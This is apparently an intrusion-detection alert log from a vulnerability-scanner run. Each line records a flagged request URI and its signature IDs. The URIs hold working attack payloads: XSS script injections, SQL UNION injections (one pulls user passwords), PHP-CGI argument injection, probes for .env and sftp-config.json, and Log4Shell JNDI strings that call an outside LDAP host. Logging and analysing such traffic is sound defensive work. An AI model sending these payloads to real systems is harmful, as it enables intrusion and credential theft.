Packet [8692]	Uri [/cgi-bin/kommentar.php?filecat="><script>alert(/xss-test/)</script>&fileid=0]	Nattacks [1]	Signatures	[2009714]
Packet [8693]	Uri [/web/kommentar.php?filecat="><script>alert(/xss-test/)</script>&fileid=0]	Nattacks [1]	Signatures	[2009714]
Packet [8701]	Uri [/adframe.php?refresh=example.com'<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8702]	Uri [/cgi-bin/adframe.php?refresh=example.com'<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8703]	Uri [/web/adframe.php?refresh=example.com'<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8724]	Uri [/phpauctions/viewfaqs.php?cat=-1+union+select+1]	Nattacks [1]	Signatures	[2006446]
Packet [8725]	Uri [/phpauction/viewfaqs.php?cat=-1+union+select+1]	Nattacks [1]	Signatures	[2006446]
Packet [8726]	Uri [/auction/viewfaqs.php?cat=-1+union+select+1]	Nattacks [1]	Signatures	[2006446]
Packet [8727]	Uri [/viewfaqs.php?cat=-1+union+select+1]	Nattacks [1]	Signatures	[2006446]
Packet [8728]	Uri [/cgi-bin/viewfaqs.php?cat=-1+union+select+1]	Nattacks [1]	Signatures	[2006446]
Packet [8729]	Uri [/web/viewfaqs.php?cat=-1+union+select+1]	Nattacks [1]	Signatures	[2006446]
Packet [8737]	Uri [/booking_calendar/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>]	Nattacks [2]	Signatures	[2009714]	[2014067]
Packet [8738]	Uri [/cal/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>]	Nattacks [2]	Signatures	[2009714]	[2014067]
Packet [8739]	Uri [/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>]	Nattacks [2]	Signatures	[2009714]	[2014067]
Packet [8740]	Uri [/cgi-bin/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>]	Nattacks [2]	Signatures	[2009714]	[2014067]
Packet [8741]	Uri [/web/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>]	Nattacks [2]	Signatures	[2009714]	[2014067]
Packet [8746]	Uri [/cgi-bin/php?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input]	Nattacks [1]	Signatures	[2014704]
Packet [8747]	Uri [/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8749]	Uri [/cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8751]	Uri [/cgi-bin/php4-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8753]	Uri [/cgi-bin/php4.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8755]	Uri [/cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8757]	Uri [/cgi-bin/php5-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8759]	Uri [/cgi-bin/php5.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8761]	Uri [/cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8763]	Uri [/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E]	Nattacks [6]	Signatures	[2016977]	[2016978]	[2016979]	[2016980]	[2016981]	[2016982]
Packet [8774]	Uri [/parser/parser.php?file=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8775]	Uri [/phpcom/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8776]	Uri [/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8778]	Uri [/cgi-bin/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8779]	Uri [/web/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8788]	Uri [/module.php?mod=<script>alert(8154711)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8789]	Uri [/cms/module.php?mod=<script>alert(8154711)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8790]	Uri [/cgi-bin/module.php?mod=<script>alert(8154711)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8791]	Uri [/web/module.php?mod=<script>alert(8154711)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8792]	Uri [/phpgraphy/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8793]	Uri [/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8794]	Uri [/cgi-bin/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8795]	Uri [/web/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8853]	Uri [/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [8854]	Uri [/recipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [8855]	Uri [/recipe/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [8856]	Uri [/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [8857]	Uri [/cgi-bin/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [8858]	Uri [/web/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--]	Nattacks [3]	Signatures	[2006445]	[2006446]	[2010963]
Packet [8861]	Uri [/index.php?error=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8862]	Uri [/cgi-bin/index.php?error=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8863]	Uri [/web/index.php?error=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8939]	Uri [/search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30]	Nattacks [1]	Signatures	[2009714]
Packet [8940]	Uri [/cgi-bin/search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30]	Nattacks [1]	Signatures	[2009714]
Packet [8941]	Uri [/web/search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30]	Nattacks [1]	Signatures	[2009714]
Packet [8943]	Uri [/mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [8944]	Uri [/cgi-bin/mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [8945]	Uri [/web/mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [8953]	Uri [/phpwebthings/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*]	Nattacks [1]	Signatures	[2006446]
Packet [8954]	Uri [/webthings/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*]	Nattacks [1]	Signatures	[2006446]
Packet [8955]	Uri [/phpwt/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*]	Nattacks [1]	Signatures	[2006446]
Packet [8956]	Uri [/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*]	Nattacks [1]	Signatures	[2006446]
Packet [8957]	Uri [/cgi-bin/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*]	Nattacks [1]	Signatures	[2006446]
Packet [8958]	Uri [/web/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*]	Nattacks [1]	Signatures	[2006446]
Packet [8968]	Uri [/cms/index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8969]	Uri [/index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8970]	Uri [/cgi-bin/index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8971]	Uri [/web/index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8989]	Uri [/posh/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8990]	Uri [/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8991]	Uri [/cgi-bin/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8992]	Uri [/web/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9030]	Uri [/index.php?function=add_kom&no=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9032]	Uri [/cgi-bin/index.php?function=add_kom&no=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9034]	Uri [/web/index.php?function=add_kom&no=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9036]	Uri [/login.php?login=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9037]	Uri [/cgi-bin/login.php?login=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9038]	Uri [/web/login.php?login=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9039]	Uri [/profil.php?id=1%20<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9040]	Uri [/cgi-bin/profil.php?id=1%20<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9041]	Uri [/web/profil.php?id=1%20<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9052]	Uri [/cms/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [9053]	Uri [/qwerty/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [9054]	Uri [/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [9055]	Uri [/cgi-bin/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [9056]	Uri [/web/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374]	Nattacks [1]	Signatures	[2006446]
Packet [9070]	Uri [/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x53514c2d496e6a656374696f6e2d54657374,null,null,null]	Nattacks [1]	Signatures	[2006446]
Packet [9071]	Uri [/cgi-bin/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x53514c2d496e6a656374696f6e2d54657374,null,null,null]	Nattacks [1]	Signatures	[2006446]
Packet [9072]	Uri [/web/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x53514c2d496e6a656374696f6e2d54657374,null,null,null]	Nattacks [1]	Signatures	[2006446]
Packet [9073]	Uri [/revsense/index.php?section=<script>alert(document.cookie)</script>&action=login]	Nattacks [1]	Signatures	[2009714]
Packet [9074]	Uri [/index.php?section=<script>alert(document.cookie)</script>&action=login]	Nattacks [1]	Signatures	[2009714]
Packet [9075]	Uri [/cgi-bin/index.php?section=<script>alert(document.cookie)</script>&action=login]	Nattacks [1]	Signatures	[2009714]
Packet [9076]	Uri [/web/index.php?section=<script>alert(document.cookie)</script>&action=login]	Nattacks [1]	Signatures	[2009714]
Packet [9095]	Uri [/snpfiltered.pl?t=c&u=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9096]	Uri [/cgi-bin/snpfiltered.pl?t=c&u=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9097]	Uri [/web/snpfiltered.pl?t=c&u=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9098]	Uri [/roomjuice/display.php?filename=<script>alert('openvasvt')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9099]	Uri [/display.php?filename=<script>alert('openvasvt')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9100]	Uri [/cgi-bin/display.php?filename=<script>alert('openvasvt')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9101]	Uri [/web/display.php?filename=<script>alert('openvasvt')</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9129]	Uri [/sftp-config.json]	Nattacks [1]	Signatures	[2015940]
Packet [9146]	Uri [/cgi-bin/sftp-config.json]	Nattacks [1]	Signatures	[2015940]
Packet [9162]	Uri [/web/sftp-config.json]	Nattacks [1]	Signatures	[2015940]
Packet [9173]	Uri [/software/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]	Nattacks [1]	Signatures	[2006446]
Packet [9174]	Uri [/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]	Nattacks [1]	Signatures	[2006446]
Packet [9175]	Uri [/cgi-bin/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]	Nattacks [1]	Signatures	[2006446]
Packet [9176]	Uri [/web/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]	Nattacks [1]	Signatures	[2006446]
Packet [9177]	Uri [/ez/showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--]	Nattacks [1]	Signatures	[2006446]
Packet [9178]	Uri [/showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--]	Nattacks [1]	Signatures	[2006446]
Packet [9179]	Uri [/cgi-bin/showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--]	Nattacks [1]	Signatures	[2006446]
Packet [9180]	Uri [/web/showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--]	Nattacks [1]	Signatures	[2006446]
Packet [9247]	Uri [/web/${jndi:ldap://192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9303]	Uri [/.env]	Nattacks [1]	Signatures	[2031502]
Packet [9305]	Uri [/web/${jndi:ldap://kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9311]	Uri [/silex/sitemap.php?id_site=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9313]	Uri [/cms/sitemap.php?id_site=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9315]	Uri [/sitemap.php?id_site=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9317]	Uri [/cgi-bin/sitemap.php?id_site=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9319]	Uri [/web/sitemap.php?id_site=<script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9342]	Uri [/web/${jndi:ldap://127.0.0.1#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9405]	Uri [/classified/adverts.php?category_id=5%20UNION%20ALL%20SELECT%201,2,0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10]	Nattacks [1]	Signatures	[2006446]
Packet [9407]	Uri [/web/${jndi:ldap://127.0.0.1#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9410]	Uri [/search.php?searchfor="><script>window.alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9412]	Uri [/cgi-bin/search.php?searchfor="><script>window.alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9414]	Uri [/web/search.php?searchfor="><script>window.alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9439]	Uri [/index.php?path=<script>malicious_code</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9441]	Uri [/cgi-bin/index.php?path=<script>malicious_code</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9443]	Uri [/web/index.php?path=<script>malicious_code</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9454]	Uri [/showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9455]	Uri [/web/${jndi:ldap://localhost#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9456]	Uri [/cgi-bin/showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9458]	Uri [/web/showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9476]	Uri [/<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9480]	Uri [/cgi-bin/.env]	Nattacks [1]	Signatures	[2031502]
Packet [9524]	Uri [/web/${jndi:ldap://localhost#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9581]	Uri [/web/?param=${jndi:ldap://192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9642]	Uri [/newscoop/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/xss-test/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9644]	Uri [/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/xss-test/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9645]	Uri [/web/?param=${jndi:ldap://kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9647]	Uri [/cgi-bin/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/xss-test/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9649]	Uri [/web/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/xss-test/%29;%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9684]	Uri [/web/.env]	Nattacks [1]	Signatures	[2031502]
